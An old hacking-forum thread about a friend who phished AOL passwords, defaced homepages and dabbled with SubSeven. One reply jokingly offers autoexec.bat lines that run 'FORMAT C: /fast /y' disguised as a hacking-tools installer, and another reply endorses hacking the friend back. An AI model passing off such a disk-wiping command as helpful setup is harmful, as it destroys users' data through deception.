Your browser does not seem to support CSS. If images appear below, please disregard them.
toggle
February
S M T W T F S
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29
Sponsored Links
Latest Postings
Topic Options
Rate This Topic
#3702 - 08/11/02 09:23 PM Something to be done
Joined: Mar 2002
Posts: 536
Deviation187 Offline
Member
Deviation187 Offline
Member

Joined: Mar 2002
Posts: 536
L.A Cal.
ALright my friend is very curious about hacking and hell he wishes he knew how to do it, hes done some stupid trick to get ppl to give him their pwds' im not about to explain, but i got annoyed to the fact he used ppls passw0rds and went in their aol homepages and wrote stuff, lol his little comment is pretty dumb in itself. well unlesss its now changed the site is This One and yeah well he calls his hacking lol but he wants to learn, yet this is no way to start, what can be done, if any of u have ideas, feel free to try them lol. something has to be done, or this kid is gonna end up very odd..


"Hmm, they have the internet on computers now." - Homer Simpson
http://wired.promodtecnologies.com/
Top
Sponsored Links
#3703 - 08/11/02 09:24 PM Re: Something to be done
Joined: Mar 2002
Posts: 536
Deviation187 Offline
Member
Deviation187 Offline
Member

Joined: Mar 2002
Posts: 536
L.A Cal.
btw, yeah what he did is at the bottom of the page cuz "he liked the page" and his name well all the stuff is there.


"Hmm, they have the internet on computers now." - Homer Simpson
http://wired.promodtecnologies.com/
Top
#3704 - 08/11/02 09:27 PM Re: Something to be done
Joined: Mar 2002
Posts: 185
Mornse Offline
Member
Mornse Offline
Member

Joined: Mar 2002
Posts: 185
Vancouver
Well, I think it's pretty obvious what needs to be done. The exact same thing that we tell everyone else who comes here with dumb "how do I hack" questions. Read. Read. Read and read some more. Give him links to this site, RRFN, and any other good sites you can think of. Get him to by some books and start coding.


Cha want some w***up?

http://www.dopeskill.com
Top
#3705 - 08/11/02 09:31 PM Re: Something to be done
Joined: Mar 2002
Posts: 536
Deviation187 Offline
Member
Deviation187 Offline
Member

Joined: Mar 2002
Posts: 536
L.A Cal.
heh! lets just see if hes willing to read, but id like to see the same thing done to him lol, that would be funny, but yeah i tell him to read yet he doesnt get it, hes into subseven :\ lol and he cant figure out how to use it, but I aint gonna tell him he even went as far as asking if he could infect me to test it out, this guy is confused lol.


"Hmm, they have the internet on computers now." - Homer Simpson
http://wired.promodtecnologies.com/
Top
#3706 - 08/12/02 12:12 AM Re: Something to be done
Joined: Mar 2002
Posts: 860
unreal Offline
Der ‹beltšter
unreal Offline
Der ‹beltšter

Joined: Mar 2002
Posts: 860
KCRQ
This may be silly and immature, but hacking his page back to teach him a lesson would be some funny shit.

Top
#3707 - 08/12/02 08:55 AM Re: Something to be done
Joined: Mar 2002
Posts: 536
Deviation187 Offline
Member
Deviation187 Offline
Member

Joined: Mar 2002
Posts: 536
L.A Cal.
haha yeah not a bad idea, hmm yeah find someone willing to do it though :p bleh ill just ignore when he tries to talk to me about his subseven, and fake hacking stuff..


"Hmm, they have the internet on computers now." - Homer Simpson
http://wired.promodtecnologies.com/
Top
#3708 - 08/12/02 04:24 PM Re: Something to be done
Joined: Mar 2002
Posts: 257
psychogen Offline
Member
psychogen Offline
Member

Joined: Mar 2002
Posts: 257
UK
tell him that adding

FORMAT C: /fast /y
MD Hacking
MD Hacking/Docs
MD Hacking/Utils
ECHO All Hacking Docs and Utils installed!
ECHO Greetz from the AOL hackin Cr3w
ECHO Hit ALT+CTRL+DELETE to restart into hacking mode

to his autoexec.bat file will do it all automatically.

/me points to my signature part 1


The use of "hacker" to mean "security breaker" is a confusion on the part of the mass media. We hackers refuse to recognize that meaning, and continue using the word to mean, "Someone who loves to program and enjoys being clever about it."
--------------------
"Its not a bug, its a feature" (Epic Games)
Top
#3709 - 08/12/02 04:45 PM Re: Something to be done
Joined: Mar 2002
Posts: 270
HighLander Offline
UGN Member
HighLander Offline
UGN Member

Joined: Mar 2002
Posts: 270
Canada
AHH! What happened all my stuff is gone now after that code in my Autoexec file, what happened, I thought it would make me a h4ck3r......


Unless you try something to which you have not already succeeded ~ Then you shall NEVER grow
Top

Member Spotlight
Gremelin

Gremelin
Portland, OR; USA
Posts: 7,194
Joined: February 2002
Show All Member Profiles 
Forum Statistics
Forums46
Topics43,885
Posts79,059
Members2,157
Most Online1,567
Apr 25th, 2010
Top Posters(All Time)
UGN Security 37,048
Gremelin 7,194
SilentRage 1,273
Ice 1,146
pergesu 1,136
Infinite 1,041
jonconley 955
Girlie 908
unreal 860
Newest Members
Herbert_Sherbert, codemauve, Lillysdragon1984, Brewwit, boa
2157 Registered Users
Who's Online Now
0 registered members (), 0 guests and 0 spiders.
Latest News